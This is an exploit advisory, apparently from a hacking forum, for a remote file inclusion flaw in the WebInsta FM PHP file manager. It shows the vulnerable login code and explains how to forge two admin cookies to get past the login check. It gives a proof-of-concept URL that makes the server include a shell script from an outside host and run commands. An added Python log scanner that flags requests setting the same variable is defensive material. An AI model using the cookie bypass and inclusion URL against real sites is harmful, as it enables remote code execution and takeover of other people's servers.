Program Title ################################################################################
WebInsta FM <= 0.1.4 Remote File Inclusion Vulnerability

Description ##################################################################################
This is a basic file manager written by WebInsta.com

Vuln Code ####################################################################################
In /admin/login.php:

    if(isset($_COOKIE['adminname']) && isset($_COOKIE['adminpass'])){
        // Only the presence of the two cookies is checked here, not their values.
        $cusername = $_COOKIE['adminname'];
        $cpassword = $_COOKIE['adminpass'];
        // $absolute_path is the variable the PoC URL below supplies in the query string.
        include($absolute_path."admin/checkpass.php");
    }

Exploit ######################################################################################
In order for this exploit to work, you need to set two cookies. Once set, these cookies are never checked for their actual content. If you use Firefox, you can set them with the AnEC Cookie Editor extension. The two cookies should be set as follows:

NAME - adminname
CONTENT - anything here
HOST - current site (www.site.com)
PATH - nothing

NAME - adminpass
CONTENT - anything here
HOST - current site (www.site.com)
PATH - nothing

Once set, the PoC URL is as follows:

http://site.com/path/to/files/admin/login.php?absolute_path=http://shell.com/shell.txt?cmd=ls

Note: Register globals must be ON, and Magic Quotes must be OFF for this exploit to work.

Script Download ##############################################################################
http://webinsta.com/cgi-bin/axs/ax.pl?http://www.webinsta.com/downloads/webinstafm.zip

Original Advisory ############################################################################
http://g00ns-forum.net/

Shouts #######################################################################################
g00ns.net 13337.org rezen.org

By MurderSkillz & FiSh of g00ns.net
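
Added example (not part of the original advisory and not WebInsta code): a Python access-log check that flags any request setting the absolute_path variable used in the PoC URL above, and marks it more severe when the value is a URL. The log lines, the /fm/ path, the remote.example host, the function names and the two severity labels are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "absolute_path"  # variable named in the advisory's PoC URL
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Scheme (http:, ftp:, php:, ...), protocol-relative // or UNC \\ prefix.
URL_RE = re.compile(r"^\s*([a-z][a-z0-9+.\-]+:|//|\\\\)", re.I)

# Constructed sample lines in common log format, not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /fm/admin/login.php HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2007:10:00:05 +0000] "GET /fm/admin/login.php'
    '?absolute_path=http://remote.example/x.txt HTTP/1.1" 200 90',
    '192.0.2.44 - - [01/Jan/2007:10:00:09 +0000] "GET /fm/admin/login.php'
    '?absolute%5Fpath=%2568ttp%253A%252F%252Fremote.example%252Fx.txt HTTP/1.1" 200 90',
    '192.0.2.7 - - [01/Jan/2007:10:01:00 +0000] "GET /fm/index.php'
    '?absolute_path=/var/www/fm/ HTTP/1.1" 200 2048',
    '192.0.2.8 - - [01/Jan/2007:10:02:00 +0000] "GET /fm/index.php?page=absolute_path HTTP/1.1" 200 9',
]

def decode_fully(value, rounds=3):
    """Percent-decode `rounds` more times so multiply-encoded values are recognised."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify(line):
    """Return (client, path, value, severity) if the request sets PARAM, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    parts = urlsplit(target)
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # PHP maps '.' and ' ' in incoming variable names to '_'.
        if name.replace(".", "_").replace(" ", "_") != PARAM:
            continue
        value = decode_fully(value)
        severity = "remote-include" if URL_RE.match(value) else "variable-override"
        return client, parts.path, value, severity
    return None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit, sep="\t")
```

No legitimate client needs to send this variable, so the variable-override hits deserve review as well as the remote-include ones.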